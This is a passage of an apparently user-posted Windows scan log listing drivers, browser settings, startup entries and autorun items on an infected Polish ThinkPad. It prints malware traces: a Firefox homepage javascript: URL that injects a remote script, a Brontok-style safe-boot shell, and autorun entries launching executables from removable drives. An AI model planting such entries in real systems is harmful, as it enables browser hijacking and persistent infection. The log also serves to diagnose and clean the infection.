[2007-01-09 16:32:14 | 000,027,576 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV) DRV - [2007-01-09 16:32:14 | 000,012,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMDNS.SYS -- (SYMDNS) DRV - [2007-01-03 09:05:02 | 000,417,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys -- (SPBBCDrv) DRV - [2006-12-28 00:48:26 | 000,212,280 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\ProgramData\Symantec\Definitions\SymcData\idsdefs\20070108.003\IDSvix86.sys -- (IDSvix86) DRV - [2006-11-06 10:24:56 | 000,012,080 | ---- | M] (Lenovo Group Limited) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\PROCDD.SYS -- (PROCDD) DRV - [2006-11-02 09:30:54 | 001,781,760 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NETw3v32.sys -- (NETw3v32) Sterownik karty Intel(R) DRV - [2006-08-30 12:04:04 | 000,013,744 | ---- | M] (Lenovo Group Limited) [Kernel | System | Running] -- C:\Windows\System32\drivers\smiif32.sys -- (lenovo.smi) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.live.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = 
http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = [Binary data over 100 bytes] IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = my.daemon-search.com IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.selectedEngine: "DAEMON Search" FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki.js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();"); FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6 FF - prefs.js..extensions.enabledItems: {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103 FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550 FF - prefs.js..extensions.enabledItems: wrc@avast.com:6.0.1203 FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024 FF - prefs.js..network.proxy.type: 0 FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32.dll () FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) 
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-07-08 14:35:29 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011-07-12 14:30:45 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011-07-12 14:22:06 | 000,000,000 | ---D | M] [2011-04-02 18:52:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Extensions [2011-07-12 14:30:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions [2011-04-30 22:03:44 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} [2011-06-08 22:14:38 | 000,000,000 | ---D | M] (Adobe DLM (powered by getPlus(R))) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2011-07-11 13:14:19 | 000,000,000 | ---D | M] ("DAEMON Tools Toolbar") -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\DTToolbar@toolbarnet.com [2011-07-12 14:30:53 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\nostmp [2011-07-11 13:14:03 | 000,002,055 | ---- | M] () -- C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\daemon-search.xml 
[2011-07-12 14:30:44 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions File not found (No name found) -- [2011-07-08 14:35:29 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF [2011-04-05 06:54:09 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V3.5\WINDOWS PRESENTATION FOUNDATION\DOTNETASSISTANTEXTENSION [2011-07-08 09:50:30 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2010-01-01 10:00:00 | 000,002,767 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\allegro-pl.xml [2010-01-01 10:00:00 | 000,001,406 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\fbc-pl.xml [2010-01-01 10:00:00 | 000,000,917 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\merlin-pl.xml [2010-01-01 10:00:00 | 000,000,858 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\pwn-pl.xml [2010-01-01 10:00:00 | 000,001,183 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-pl.xml [2010-01-01 10:00:00 | 000,001,683 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wp-pl.xml O1 HOSTS File: ([2006-09-18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBHO.dll (Symantec Corporation) O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O2 - BHO: (avast! 
WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O2 - BHO: (Windows Live Toolbar Helper) - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O2 - BHO: (CPwmIEBrowserHelper Object) - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O3 - HKLM\..\Toolbar: (DAEMON Tools Toolbar) - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll () O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O3 - HKLM\..\Toolbar: (Show Norton Toolbar) - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll (Symantec Corporation) O3 - HKLM\..\Toolbar: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O3 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\..\Toolbar\WebBrowser: (DAEMON Tools Toolbar) - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll () O3 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\..\Toolbar\WebBrowser: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software) O4 - HKLM..\Run: [MSConfig] C:\Windows\System32\msconfig.exe (Microsoft Corporation) O4 - HKLM..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe (Simply Super Software) O4 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000..\Run: [Tok-Cirrhatus] File not found O7 - 
HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O8 - Extra context menu item: &Windows Live Search - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm () O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) 
O9 - Extra Button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O13 - gopher Prefix: missing O16 - DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Shockwave ActiveX Control) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 O18 - Protocol\Handler\pure-go {4746C79A-2042-4332-8650-48966E44ABA8} - C:\Program Files\Common Files\Pure Networks Shared\puresp3.dll (Pure Networks, Inc.) 
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O24 - Desktop BackupWallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O31 - SafeBoot: AlternateShell - cmd-brontok.exe O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O33 - MountPoints2\{00f5a3a8-afda-11dd-95bf-001c259197e1}\Shell - "" = AutoRun O33 - MountPoints2\{00f5a3a8-afda-11dd-95bf-001c259197e1}\Shell\AutoRun\command - "" = D:\AutoRun.exe O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\AutoRun\command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\explore\Command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\open\Command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{1e5b6524-80ff-11e0-8fe6-001f3addec02}\Shell\AutoRun\command - "" = D:\setup.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\AutoRun\command - "" = D:\fooool.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\explore\Command - "" = D:\fooool.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\open\Command - "" = D:\fooool.exe O33 - MountPoints2\{43694ecf-afdb-11dd-9fa3-001c259197e1}\Shell - "" = AutoRun O33 - MountPoints2\{43694ecf-afdb-11dd-9fa3-001c259197e1}\Shell\AutoRun\command - "" = D:\AutoRun.exe O33 - MountPoints2\{51726f53-a584-11df-b4d8-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{51726f53-a584-11df-b4d8-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{608ca0a6-af10-11e0-ab70-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{608ca0a6-af10-11e0-ab70-001f3addec02}\Shell\open\Command - "" = 
D:\p3vwxx.exe O33 - MountPoints2\{8993f188-70c6-11e0-a9e7-001f3addec02}\Shell\AutoRun\command - "" = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\kvqIox.exE O33 - MountPoints2\{8d4f1fa8-e989-11df-9695-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{8d4f1fa8-e989-11df-9695-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{a446109a-42be-11de-9508-001f3addec02}\Shell\AutoRun\command - "" = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\HAIhAEp.ExE O33 - MountPoints2\{c71d00f1-ab91-11e0-8a57-001f3addec02}\Shell - "" = AutoRun O33 - MountPoints2\{c71d00f1-ab91-11e0-8a57-001f3addec02}\Shell\AutoRun\command - "" = E:\setup.exe O33 - MountPoints2\{d1151128-b2d6-11df-88f8-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{d1151128-b2d6-11df-88f8-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{f0af448d-ea5d-11df-b240-001f3addec02}\Shell\AutoRun\command - "" = E:\p3vwxx.exe O33 - MountPoints2\{f0af448d-ea5d-11df-b240-001f3addec02}\Shell\open\Command - "" = E:\p3vwxx.exe O34 - HKLM BootExecute: (autocheck autochk *) - File not found O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - File not found NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found NetSvcs: uploadmgr - File not found MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^BTTray.lnk - C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe - (Broadcom Corporation.) 
MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk - C:\Program Files\Digital Line Detect\DLG.exe - (Avanquest Software ) MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^LenovoRegistration.lnk - C:\SWTOOLS\LenovoWelcome\LenovoRegistration.cmd - () MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk - C:\Program Files\McAfee Security Scan\2.0.181\SSScheduler.exe - (McAfee, Inc.) MsConfig - StartUpReg: [b]ACTray[/b] - hkey= - key= - C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe (Lenovo) MsConfig - StartUpReg: [b]ACWLIcon[/b] - hkey= - key= - C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe (Lenovo) MsConfig - StartUpReg: [b]Adobe ARM[/b] - hkey= - key= - C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]Adobe Reader Speed Launcher[/b] - hkey= - key= - C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]AMSG[/b] - hkey= - key= - C:\Program Files\ThinkVantage\AMSG\Amsg.exe (LENOVO) MsConfig - StartUpReg: [b]AwaySch[/b] - hkey= - key= - C:\Program Files\Lenovo\AwayTask\AwaySch.EXE (Lenovo Group Limited) MsConfig - StartUpReg: [b]BLOG[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]ccApp[/b] - hkey= - key= - C:\Program Files\Common Files\Symantec Shared\ccApp.exe (Symantec Corporation) MsConfig - StartUpReg: [b]ChomikBox[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]cssauth[/b] - hkey= - key= - C:\Program Files\Lenovo\Client Security Solution\cssauth.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]DiskeeperSystray[/b] - hkey= - key= - C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe (Diskeeper Corporation) MsConfig - StartUpReg: [b]ehTray.exe[/b] - hkey= - key= - C:\Windows\ehome\ehtray.exe (Microsoft Corporation) MsConfig - 
StartUpReg: [b]EZEJMNAP[/b] - hkey= - key= - C:\Program Files\ThinkPad\Utilities\EZEJMNAP.EXE (Lenovo Group Ltd.) MsConfig - StartUpReg: [b]HotKeysCmds[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IgfxTray[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IPLA![/b] - hkey= - key= - C:\Program Files\ipla\ipla.exe (Redefine Sp z o.o.) MsConfig - StartUpReg: [b]iPlusManager[/b] - hkey= - key= - C:\Program Files\iPlus\iPlusChecker.exe () MsConfig - StartUpReg: [b]LenovoOobeOffers[/b] - hkey= - key= - c:\SWTOOLS\LenovoWelcome\LenovoOobeOffers.exe (lenovo) MsConfig - StartUpReg: [b]LPManager[/b] - hkey= - key= - C:\Program Files\Lenovo\LenovoCare\LPMGR.EXE (Lenovo Group Limited) MsConfig - StartUpReg: [b]nmapp[/b] - hkey= - key= - C:\Program Files\Pure Networks\Network Magic\nmapp.exe (Pure Networks, Inc.) MsConfig - StartUpReg: [b]Persistence[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]PWMTRV[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]Sidebar[/b] - hkey= - key= - C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation) MsConfig - StartUpReg: [b]Skype[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]SunJavaUpdateSched[/b] - hkey= - key= - C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe (Sun Microsystems, Inc.) 
MsConfig - StartUpReg: [b]Symantec PIF AlertEng[/b] - hkey= - key= - C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation) MsConfig - StartUpReg: [b]TPFNF7[/b] - hkey= - key= - C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]TPHOTKEY[/b] - hkey= - key= - C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]TpShocks[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]TrackPointSrv[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]TVT Scheduler Proxy[/b] - hkey= - key= - C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]Windows Defender[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]WMPNSCFG[/b] - hkey= - key= - C:\Program Files\Windows Media Player\wmpnscfg.exe (Microsoft Corporation) MsConfig - State: "services" - 2 MsConfig - State: "startup" - 1
000,007,052 | ---- | C] () -- C:\Windows\System32\nlsfunc.exe [2006-11-02 09:09:55 | 000,039,274 | ---- | C] () -- C:\Windows\System32\mem.exe [2006-11-02 09:09:55 | 000,001,131 | ---- | C] () -- C:\Windows\System32\LOADFIX.COM [2006-11-02 09:09:53 | 000,011,753 | ---- | C] () -- C:\Windows\System32\setver.exe [2006-11-02 09:09:52 | 000,020,634 | ---- | C] () -- C:\Windows\System32\debug.exe [2006-11-02 09:09:51 | 000,008,424 | ---- | C] () -- C:\Windows\System32\exe2bin.exe [2006-11-02 09:09:50 | 000,012,642 | ---- | C] () -- C:\Windows\System32\edlin.exe [2006-11-02 09:09:49 | 000,050,648 | ---- | C] () -- C:\Windows\System32\COMMAND.COM [2006-11-02 09:09:49 | 000,012,498 | ---- | C] () -- C:\Windows\System32\append.exe [2006-11-02 09:09:45 | 000,027,097 | ---- | C] () -- C:\Windows\System32\country.sys [2006-11-02 09:09:44 | 000,042,809 | ---- | C] () -- C:\Windows\System32\KEY01.SYS [2006-11-02 09:09:44 | 000,042,537 | ---- | C] () -- C:\Windows\System32\KEYBOARD.SYS [2006-11-02 09:09:42 | 000,009,029 | ---- | C] () -- C:\Windows\System32\ANSI.SYS [2006-11-02 09:09:41 | 000,004,768 | ---- | C] () -- C:\Windows\System32\HIMEM.SYS [2006-11-02 09:09:40 | 000,029,274 | ---- | C] () -- C:\Windows\System32\NTDOS412.SYS [2006-11-02 09:09:38 | 000,029,370 | ---- | C] () -- C:\Windows\System32\NTDOS411.SYS [2006-11-02 09:09:35 | 000,029,146 | ---- | C] () -- C:\Windows\System32\NTDOS404.SYS [2006-11-02 09:09:31 | 000,029,146 | ---- | C] () -- C:\Windows\System32\NTDOS804.SYS [2006-11-02 09:09:29 | 000,027,866 | ---- | C] () -- C:\Windows\System32\NTDOS.SYS [2006-11-02 09:09:26 | 000,035,536 | ---- | C] () -- C:\Windows\System32\NTIO412.SYS [2006-11-02 09:09:24 | 000,035,776 | ---- | C] () -- C:\Windows\System32\NTIO411.SYS [2006-11-02 09:09:23 | 000,034,672 | ---- | C] () -- C:\Windows\System32\NTIO404.SYS [2006-11-02 09:09:22 | 000,034,672 | ---- | C] () -- C:\Windows\System32\NTIO804.SYS [2006-11-02 09:09:20 | 000,033,952 | ---- | C] () -- C:\Windows\System32\NTIO.SYS 
[2006-11-02 08:47:51 | 000,364,544 | ---- | C] () -- C:\Windows\System32\msjetoledb40.dll [2006-11-02 08:25:08 | 000,013,312 | ---- | C] () -- C:\Windows\System32\win87em.dll [2003-04-08 11:40:22 | 000,005,679 | ---- | C] () -- C:\Windows\System32\OUTLPERF.INI [2001-11-14 14:56:00 | 001,802,240 | ---- | C] () -- C:\Windows\System32\lcppn21.dll [color=#E56717]========== LOP Check ==========[/color] [2011-07-15 21:19:24 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\AIMP [2011-04-03 14:50:26 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\BitSpirit [2011-07-11 13:16:11 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite [2011-05-02 20:57:59 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Gadu-Gadu [2011-04-27 08:53:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Gadu-Gadu 10 [2010-11-13 15:49:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\HateML [2011-07-14 22:04:25 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\ipla [2009-05-01 22:19:23 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\iPlus [2009-04-13 09:10:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Leadertech [2008-11-10 14:55:49 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Lenovo [2011-06-04 13:27:40 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Nowe Gadu-Gadu [2011-04-02 19:50:14 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\OpenFM [2011-05-29 19:45:53 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Opera [2009-03-17 17:05:22 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\PeerNetworking [2011-07-08 14:15:55 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\PhotoScape [2011-07-15 21:13:47 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Safer Networking [2011-07-15 20:38:17 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Simply Super Software [2011-07-16 12:06:05 | 000,032,618 | ---- | M] () -- 
C:\Windows\Tasks\SCHEDLGU.TXT [2011-07-18 10:30:01 | 000,000,264 | ---- | M] () -- C:\Windows\Tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job [2011-07-17 11:43:26 | 000,000,428 | -H-- | M] () -- C:\Windows\Tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Custom Scans ==========[/color] [color=#A23BEC]< %systemdrive%\*.* >[/color] [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () -- C:\autoexec.bat [2006-11-02 11:53:57 | 000,438,840 | RHS- | M] () -- C:\bootmgr [2006-11-10 03:04:46 | 000,008,192 | R-S- | M] () -- C:\BOOTSECT.BAK [2006-09-18 23:43:37 | 000,000,010 | ---- | M] () -- C:\config.sys [2011-07-17 22:10:44 | 2137,440,256 | -HS- | M] () -- C:\hiberfil.sys [2011-07-17 22:10:41 | 2451,374,080 | -HS- | M] () -- C:\pagefile.sys [2008-11-10 13:47:29 | 000,000,086 | ---- | M] () -- C:\setup.log [2008-11-10 21:58:14 | 000,000,057 | ---- | M] () -- C:\syslevel.lgl [2008-11-10 14:31:24 | 000,001,732 | ---- | M] () -- C:\tvtpktfilter.dat [color=#A23BEC]< MD5 for: AGP440.SYS >[/color] [2008-01-19 09:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys [2008-11-10 22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\System32\drivers\AGP440.sys [2008-11-10 22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_cb7c81c7\AGP440.sys [2008-11-10 